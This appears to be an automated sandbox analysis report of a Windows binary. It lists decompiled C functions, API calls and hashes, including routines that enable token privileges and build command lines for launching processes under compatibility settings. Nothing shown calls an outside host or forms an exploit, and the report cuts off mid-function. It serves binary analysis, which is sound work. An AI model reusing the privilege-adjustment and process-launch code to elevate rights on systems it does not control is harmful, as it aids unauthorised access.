                                                                                                  • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040AC52() {
                                                                                                  				struct HINSTANCE__* _t1;
                                                                                                  				_Unknown_base(*)()* _t2;
                                                                                                  
                                                                                                  				if( *0x4101c4 == 0) {
                                                                                                  					_t1 = E00405436(L"shell32.dll");
                                                                                                  					 *0x4101c4 = _t1;
                                                                                                  					if(_t1 != 0) {
                                                                                                  						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                                  						 *0x4101c0 = _t2;
                                                                                                  						return _t2;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t1;
                                                                                                  			}





                                                                                                  0x0040ac59
                                                                                                  0x0040ac60
                                                                                                  0x0040ac68
                                                                                                  0x0040ac6d
                                                                                                  0x0040ac75
                                                                                                  0x0040ac7b
                                                                                                  0x00000000
                                                                                                  0x0040ac7b
                                                                                                  0x0040ac6d
                                                                                                  0x0040ac80

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                  • API String ID: 946536540-880857682
                                                                                                  • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                  • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                  • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                  • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E00406670(char** __esi, void* __eflags) {
                                                                                                  				char* _t30;
                                                                                                  				char** _t39;
                                                                                                  
                                                                                                  				_t39 = __esi;
                                                                                                  				 *__esi = "cf@";
                                                                                                  				__esi[0xb8] = 0;
                                                                                                  				_t30 = E00404FA4(0x338, __esi);
                                                                                                  				_push(0x14);
                                                                                                  				__esi[0xcb] = 0;
                                                                                                  				__esi[0xa6] = 0;
                                                                                                  				__esi[0xb9] = 0;
                                                                                                  				__esi[0xba] = 0xfff;
                                                                                                  				__esi[8] = 0;
                                                                                                  				__esi[1] = 0;
                                                                                                  				__esi[0xb7] = 1;
                                                                                                  				L0040B26C();
                                                                                                  				if(_t30 == 0) {
                                                                                                  					_t30 = 0;
                                                                                                  				} else {
                                                                                                  					_t30[4] = 0;
                                                                                                  					_t30[0x10] = 0;
                                                                                                  					_t30[8] = 0;
                                                                                                  					_t30[0xc] = 0x100;
                                                                                                  					 *_t30 = 0;
                                                                                                  				}
                                                                                                  				_push(0x14);
                                                                                                  				_t39[2] = _t30;
                                                                                                  				L0040B26C();
                                                                                                  				if(_t30 == 0) {
                                                                                                  					_t30 = 0;
                                                                                                  				} else {
                                                                                                  					_t30[4] = 0;
                                                                                                  					_t30[0x10] = 0;
                                                                                                  					_t30[8] = 0;
                                                                                                  					_t30[0xc] = 0x100;
                                                                                                  					 *_t30 = 0;
                                                                                                  				}
                                                                                                  				_push(0x14);
                                                                                                  				_t39[3] = _t30;
                                                                                                  				L0040B26C();
                                                                                                  				if(_t30 == 0) {
                                                                                                  					_t30 = 0;
                                                                                                  				} else {
                                                                                                  					_t30[4] = 0;
                                                                                                  					_t30[0x10] = 0;
                                                                                                  					_t30[8] = 0;
                                                                                                  					_t30[0xc] = 0x100;
                                                                                                  					 *_t30 = 0;
                                                                                                  				}
                                                                                                  				_push(0x14);
                                                                                                  				_t39[4] = _t30;
                                                                                                  				L0040B26C();
                                                                                                  				if(_t30 == 0) {
                                                                                                  					_t30 = 0;
                                                                                                  				} else {
                                                                                                  					_t30[4] = 0;
                                                                                                  					_t30[0x10] = 0;
                                                                                                  					_t30[8] = 0;
                                                                                                  					_t30[0xc] = 0x100;
                                                                                                  					 *_t30 = 0;
                                                                                                  				}
                                                                                                  				_t39[5] = _t30;
                                                                                                  				return _t39;
                                                                                                  			}





                                                                                                  0x00406670
                                                                                                  0x0040667a
                                                                                                  0x00406680
                                                                                                  0x00406686
                                                                                                  0x0040668b
                                                                                                  0x0040668d
                                                                                                  0x00406693
                                                                                                  0x00406699
                                                                                                  0x0040669f
                                                                                                  0x004066a9
                                                                                                  0x004066ac
                                                                                                  0x004066af
                                                                                                  0x004066b9
                                                                                                  0x004066c7
                                                                                                  0x004066d9
                                                                                                  0x004066c9
                                                                                                  0x004066c9
                                                                                                  0x004066cc
                                                                                                  0x004066cf
                                                                                                  0x004066d2
                                                                                                  0x004066d5
                                                                                                  0x004066d5
                                                                                                  0x004066db
                                                                                                  0x004066dd
                                                                                                  0x004066e0
                                                                                                  0x004066e8
                                                                                                  0x004066fa
                                                                                                  0x004066ea
                                                                                                  0x004066ea
                                                                                                  0x004066ed
                                                                                                  0x004066f0
                                                                                                  0x004066f3
                                                                                                  0x004066f6
                                                                                                  0x004066f6
                                                                                                  0x004066fc
                                                                                                  0x004066fe
                                                                                                  0x00406701
                                                                                                  0x00406709
                                                                                                  0x0040671b
                                                                                                  0x0040670b
                                                                                                  0x0040670b
                                                                                                  0x0040670e
                                                                                                  0x00406711
                                                                                                  0x00406714
                                                                                                  0x00406717
                                                                                                  0x00406717
                                                                                                  0x0040671d
                                                                                                  0x0040671f
                                                                                                  0x00406722
                                                                                                  0x0040672a
                                                                                                  0x0040673c
                                                                                                  0x0040672c
                                                                                                  0x0040672c
                                                                                                  0x0040672f
                                                                                                  0x00406732
                                                                                                  0x00406735
                                                                                                  0x00406738
                                                                                                  0x00406738
                                                                                                  0x0040673f
                                                                                                  0x00406745

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1860491036-0
                                                                                                  • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                  • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                  • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                  • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                  				int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				void* __edi;
                                                                                                  				int _t32;
                                                                                                  				intOrPtr _t33;
                                                                                                  				intOrPtr _t36;
                                                                                                  				signed int _t48;
                                                                                                  				signed int _t58;
                                                                                                  				signed int _t59;
                                                                                                  				void** _t62;
                                                                                                  				void** _t63;
                                                                                                  				signed int* _t66;
                                                                                                  
                                                                                                  				_t66 = __eax;
                                                                                                  				_t32 = wcslen(_a4);
                                                                                                  				_t48 =  *(_t66 + 4);
                                                                                                  				_t58 = _t48 + _t32;
                                                                                                  				_v12 = _t58;
                                                                                                  				_t59 = _t58 + 1;
                                                                                                  				_v8 = _t32;
                                                                                                  				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                  				 *(_t66 + 4) = _t59;
                                                                                                  				_t62 = _t66 + 0x10;
                                                                                                  				if(_t59 != 0xffffffff) {
                                                                                                  					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                                                  				} else {
                                                                                                  					free( *_t62);
                                                                                                  				}
                                                                                                  				_t60 =  *(_t66 + 0x1c);
                                                                                                  				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                  				_t63 = _t66 + 0xc;
                                                                                                  				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                                  					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                  				} else {
                                                                                                  					free( *_t63);
                                                                                                  				}
                                                                                                  				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                  				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                  				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                  				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                  				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                  				return _t30;
                                                                                                  			}















                                                                                                  0x004054ea
                                                                                                  0x004054ec
                                                                                                  0x004054f1
                                                                                                  0x004054f4
                                                                                                  0x004054f7
                                                                                                  0x004054fa
                                                                                                  0x004054fe
                                                                                                  0x00405501
                                                                                                  0x00405505
                                                                                                  0x00405508
                                                                                                  0x0040550b
                                                                                                  0x0040551b
                                                                                                  0x0040550d
                                                                                                  0x0040550f
                                                                                                  0x0040550f
                                                                                                  0x00405521
                                                                                                  0x00405527
                                                                                                  0x0040552b
                                                                                                  0x0040552e
                                                                                                  0x0040553f
                                                                                                  0x00405530
                                                                                                  0x00405532
                                                                                                  0x00405532
                                                                                                  0x00405556
                                                                                                  0x00405561
                                                                                                  0x0040556e
                                                                                                  0x00405571
                                                                                                  0x00405578
                                                                                                  0x0040557e

                                                                                                  APIs
                                                                                                  • wcslen.MSVCRT ref: 004054EC
                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                    • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                    • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                    • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                  • memcpy.MSVCRT ref: 00405556
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 726966127-0
                                                                                                  • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                  • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                  • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                  • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 81%
                                                                                                  			E00405ADF() {
                                                                                                  				void* _t25;
                                                                                                  				signed int _t27;
                                                                                                  				signed int _t29;
                                                                                                  				signed int _t31;
                                                                                                  				signed int _t33;
                                                                                                  				signed int _t50;
                                                                                                  				signed int _t52;
                                                                                                  				signed int _t54;
                                                                                                  				signed int _t56;
                                                                                                  				intOrPtr _t60;
                                                                                                  
                                                                                                  				_t60 =  *0x41c470;
                                                                                                  				if(_t60 == 0) {
                                                                                                  					_t50 = 2;
                                                                                                  					 *0x41c470 = 0x8000;
                                                                                                  					_t27 = 0x8000 * _t50;
                                                                                                  					 *0x41c474 = 0x100;
                                                                                                  					 *0x41c478 = 0x1000;
                                                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                                                  					L0040B26C();
                                                                                                  					 *0x41c458 = _t27;
                                                                                                  					_t52 = 4;
                                                                                                  					_t29 =  *0x41c474 * _t52;
                                                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                                  					L0040B26C();
                                                                                                  					 *0x41c460 = _t29;
                                                                                                  					_t54 = 4;
                                                                                                  					_t31 =  *0x41c474 * _t54;
                                                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                                  					L0040B26C();
                                                                                                  					 *0x41c464 = _t31;
                                                                                                  					_t56 = 2;
                                                                                                  					_t33 =  *0x41c478 * _t56;
                                                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                                                  					L0040B26C();
                                                                                                  					 *0x41c45c = _t33;
                                                                                                  					return _t33;
                                                                                                  				}
                                                                                                  				return _t25;
                                                                                                  			}













                                                                                                  0x00405adf
                                                                                                  0x00405ae6
                                                                                                  0x00405af5
                                                                                                  0x00405af6
                                                                                                  0x00405afb
                                                                                                  0x00405b00
                                                                                                  0x00405b0a
                                                                                                  0x00405b18
                                                                                                  0x00405b19
                                                                                                  0x00405b1e
                                                                                                  0x00405b2c
                                                                                                  0x00405b2d
                                                                                                  0x00405b36
                                                                                                  0x00405b37
                                                                                                  0x00405b3c
                                                                                                  0x00405b4a
                                                                                                  0x00405b4b
                                                                                                  0x00405b54
                                                                                                  0x00405b55
                                                                                                  0x00405b5a
                                                                                                  0x00405b68
                                                                                                  0x00405b69
                                                                                                  0x00405b72
                                                                                                  0x00405b73
                                                                                                  0x00405b7b
                                                                                                  0x00000000
                                                                                                  0x00405b7b
                                                                                                  0x00405b80

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??2@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1033339047-0
                                                                                                  • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                  • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                  • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                  • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Executed Functions

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                                                  				void* _v8;
                                                                                                  				intOrPtr _v12;
                                                                                                  				struct _TOKEN_PRIVILEGES _v24;
                                                                                                  				void* __esi;
                                                                                                  				_Unknown_base(*)()* _t16;
                                                                                                  				_Unknown_base(*)()* _t18;
                                                                                                  				long _t19;
                                                                                                  				_Unknown_base(*)()* _t22;
                                                                                                  				_Unknown_base(*)()* _t24;
                                                                                                  				struct HINSTANCE__** _t35;
                                                                                                  				void* _t37;
                                                                                                  
                                                                                                  				_t37 = __eflags;
                                                                                                  				_t35 = __eax;
                                                                                                  				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                                                  					return GetLastError();
                                                                                                  				}
                                                                                                  				_t16 = E00408F72(_t35);
                                                                                                  				__eflags = _t16;
                                                                                                  				if(_t16 != 0) {
                                                                                                  					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                                                  					__eflags = _t24;
                                                                                                  					if(_t24 != 0) {
                                                                                                  						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_v24.PrivilegeCount = 1;
                                                                                                  				_v12 = 2;
                                                                                                  				_a4 = _v8;
                                                                                                  				_t18 = E00408F72(_t35);
                                                                                                  				__eflags = _t18;
                                                                                                  				if(_t18 != 0) {
                                                                                                  					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                                                  					__eflags = _t22;
                                                                                                  					if(_t22 != 0) {
                                                                                                  						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t19 = GetLastError();
                                                                                                  				FindCloseChangeNotification(_v8); // executed
                                                                                                  				return _t19;
                                                                                                  			}














                                                                                                  0x00408fc9
                                                                                                  0x00408fd0
                                                                                                  0x00408fe8
                                                                                                  0x00000000
                                                                                                  0x00408fea
                                                                                                  0x00408ff4
                                                                                                  0x00409001
                                                                                                  0x00409003
                                                                                                  0x0040900c
                                                                                                  0x0040900e
                                                                                                  0x00409010
                                                                                                  0x0040901a
                                                                                                  0x0040901a
                                                                                                  0x00409010
                                                                                                  0x0040901f
                                                                                                  0x00409026
                                                                                                  0x0040902d
                                                                                                  0x00409030
                                                                                                  0x00409035
                                                                                                  0x00409037
                                                                                                  0x00409040
                                                                                                  0x00409042
                                                                                                  0x00409044
                                                                                                  0x00409051
                                                                                                  0x00409051
                                                                                                  0x00409044
                                                                                                  0x00409053
                                                                                                  0x0040905e
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                  • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                  • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                  • API String ID: 616250965-1253513912
                                                                                                  • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                  • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                  • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                  • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 83%
                                                                                                  			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                                                  				WCHAR* _v8;
                                                                                                  				signed int _v12;
                                                                                                  				int _v16;
                                                                                                  				int _v20;
                                                                                                  				char* _v24;
                                                                                                  				int _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				int _v36;
                                                                                                  				int _v40;
                                                                                                  				char _v44;
                                                                                                  				void* _v56;
                                                                                                  				int _v60;
                                                                                                  				char _v92;
                                                                                                  				void _v122;
                                                                                                  				int _v124;
                                                                                                  				short _v148;
                                                                                                  				signed int _v152;
                                                                                                  				intOrPtr _v168;
                                                                                                  				intOrPtr _v172;
                                                                                                  				intOrPtr _v176;
                                                                                                  				intOrPtr _v180;
                                                                                                  				void _v192;
                                                                                                  				char _v196;
                                                                                                  				char _v228;
                                                                                                  				void _v258;
                                                                                                  				int _v260;
                                                                                                  				void _v786;
                                                                                                  				short _v788;
                                                                                                  				void _v1314;
                                                                                                  				short _v1316;
                                                                                                  				void _v1842;
                                                                                                  				short _v1844;
                                                                                                  				void _v18234;
                                                                                                  				short _v18236;
                                                                                                  				char _v83772;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				short* _t174;
                                                                                                  				short _t175;
                                                                                                  				signed int _t176;
                                                                                                  				short _t177;
                                                                                                  				short _t178;
                                                                                                  				int _t184;
                                                                                                  				signed int _t187;
                                                                                                  				intOrPtr _t207;
                                                                                                  				intOrPtr _t219;
                                                                                                  				int* _t252;
                                                                                                  				int* _t253;
                                                                                                  				int* _t266;
                                                                                                  				int* _t267;
                                                                                                  				wchar_t* _t270;
                                                                                                  				int _t286;
                                                                                                  				void* _t292;
                                                                                                  				void* _t304;
                                                                                                  				WCHAR* _t308;
                                                                                                  				WCHAR* _t310;
                                                                                                  				intOrPtr* _t311;
                                                                                                  				int _t312;
                                                                                                  				WCHAR* _t315;
                                                                                                  				void* _t325;
                                                                                                  				void* _t328;
                                                                                                  
                                                                                                  				_t304 = __edx;
                                                                                                  				E0040B550(0x1473c, __ecx);
                                                                                                  				_t286 = 0;
                                                                                                  				 *_a4 = 0;
                                                                                                  				_v12 = 0;
                                                                                                  				_v16 = 0;
                                                                                                  				_v20 = 0;
                                                                                                  				memset( &_v192, 0, 0x40);
                                                                                                  				_v60 = 0;
                                                                                                  				asm("stosd");
                                                                                                  				asm("stosd");
                                                                                                  				asm("stosd");
                                                                                                  				_v24 = 0;
                                                                                                  				_v40 = 0;
                                                                                                  				_v28 = 0;
                                                                                                  				_v36 = 0;
                                                                                                  				_v32 = 0x100;
                                                                                                  				_v44 = 0;
                                                                                                  				_v1316 = 0;
                                                                                                  				memset( &_v1314, 0, 0x208);
                                                                                                  				_v788 = 0;
                                                                                                  				memset( &_v786, 0, 0x208);
                                                                                                  				_t315 = _a8;
                                                                                                  				_t328 = _t325 + 0x24;
                                                                                                  				_v83772 = 0;
                                                                                                  				_v196 = 0x44;
                                                                                                  				E00404923(0x104,  &_v788, _t315);
                                                                                                  				if(wcschr(_t315, 0x25) != 0) {
                                                                                                  					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                                                  				}
                                                                                                  				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                                                  					_v8 = _t286;
                                                                                                  					_v1844 = _t286;
                                                                                                  					memset( &_v1842, _t286, 0x208);
                                                                                                  					_t328 = _t328 + 0xc;
                                                                                                  					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
                                                                                                  					if(_v1844 != _t286) {
                                                                                                  						E00404923(0x104,  &_v788,  &_v1844);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t308 =  &(_t315[0x2106]);
                                                                                                  				if( *_t308 == _t286) {
                                                                                                  					E00404B5C( &_v1316,  &_v788);
                                                                                                  					__eflags = _v1316 - _t286;
                                                                                                  					_t315 = _a8;
                                                                                                  					_pop(_t292);
                                                                                                  					if(_v1316 == _t286) {
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					goto L10;
                                                                                                  				} else {
                                                                                                  					_v20 = _t308;
                                                                                                  					_t270 = wcschr(_t308, 0x25);
                                                                                                  					_pop(_t292);
                                                                                                  					if(_t270 == 0) {
                                                                                                  						L11:
                                                                                                  						_t174 =  &(_t315[0x220e]);
                                                                                                  						if( *_t174 != 1) {
                                                                                                  							_v152 = _v152 | 0x00000001;
                                                                                                  							_v148 =  *_t174;
                                                                                                  						}
                                                                                                  						_t309 = ",";
                                                                                                  						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                                                  							_v260 = _t286;
                                                                                                  							memset( &_v258, _t286, 0x3e);
                                                                                                  							_v124 = _t286;
                                                                                                  							memset( &_v122, _t286, 0x3e);
                                                                                                  							_v8 = _t286;
                                                                                                  							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                                                  							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                                                  							_v152 = _v152 | 0x00000004;
                                                                                                  							_t266 =  &_v260;
                                                                                                  							_push(_t266);
                                                                                                  							L0040B1F8();
                                                                                                  							_v180 = _t266;
                                                                                                  							_t328 = _t328 + 0x3c;
                                                                                                  							_t267 =  &_v124;
                                                                                                  							L0040B1F8();
                                                                                                  							_t292 = _t267;
                                                                                                  							_v176 = _t267;
                                                                                                  						}
                                                                                                  						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                                                  							_v260 = _t286;
                                                                                                  							memset( &_v258, _t286, 0x3e);
                                                                                                  							_v124 = _t286;
                                                                                                  							memset( &_v122, _t286, 0x3e);
                                                                                                  							_v8 = _t286;
                                                                                                  							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                                                  							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                                                  							_v152 = _v152 | 0x00000002;
                                                                                                  							_t252 =  &_v260;
                                                                                                  							_push(_t252);
                                                                                                  							L0040B1F8();
                                                                                                  							_v172 = _t252;
                                                                                                  							_t328 = _t328 + 0x3c;
                                                                                                  							_t253 =  &_v124;
                                                                                                  							_push(_t253);
                                                                                                  							L0040B1F8();
                                                                                                  							_v168 = _t253;
                                                                                                  						}
                                                                                                  						_t310 =  &(_t315[0x105]);
                                                                                                  						if( *_t310 != _t286) {
                                                                                                  							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                                                  								_push(_t310);
                                                                                                  							} else {
                                                                                                  								_v18236 = _t286;
                                                                                                  								memset( &_v18234, _t286, 0x4000);
                                                                                                  								_t328 = _t328 + 0xc;
                                                                                                  								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                                                  								_push( &_v18236);
                                                                                                  							}
                                                                                                  							_push( &_v788);
                                                                                                  							_push(L"\"%s\" %s");
                                                                                                  							_push(0x7fff);
                                                                                                  							_push( &_v83772);
                                                                                                  							L0040B1EC();
                                                                                                  							_v24 =  &_v83772;
                                                                                                  						}
                                                                                                  						_t175 = _t315[0x220c];
                                                                                                  						if(_t175 != 0x20) {
                                                                                                  							_v12 = _t175;
                                                                                                  						}
                                                                                                  						_t311 = _a4;
                                                                                                  						if(_t315[0x2254] == 2) {
                                                                                                  							E00401D1E(_t311, L"RunAsInvoker");
                                                                                                  						}
                                                                                                  						_t176 = _t315[0x265c];
                                                                                                  						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                                                  							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                                                  						}
                                                                                                  						_t177 = _t315[0x265e];
                                                                                                  						if(_t177 != 1) {
                                                                                                  							__eflags = _t177 - 2;
                                                                                                  							if(_t177 != 2) {
                                                                                                  								goto L37;
                                                                                                  							}
                                                                                                  							_push(L"16BITCOLOR");
                                                                                                  							goto L36;
                                                                                                  						} else {
                                                                                                  							_push(L"256COLOR");
                                                                                                  							L36:
